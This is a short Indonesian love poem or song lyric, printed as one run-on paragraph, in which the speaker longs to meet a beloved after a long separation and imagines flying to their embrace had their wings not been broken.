Dalam hati terucap doa Ingin segera bertemu Begitu ada kesempatan Tak ku lewatkan begitu saja Langkahku semakin cepat Sungguh ku ingin segera bertemu Dengan kekasihku yang adalah kamu Tak ku hiraukan meski malam begitu pekat Sekian lama berpisah Membuatku begitu rindu padamu Setiap malam berharap sendiri Ingin segera bertemu Kalau saja waktu itu sayapku tak patah Pasti ku kan terbang menuju kehangatan pelukanmu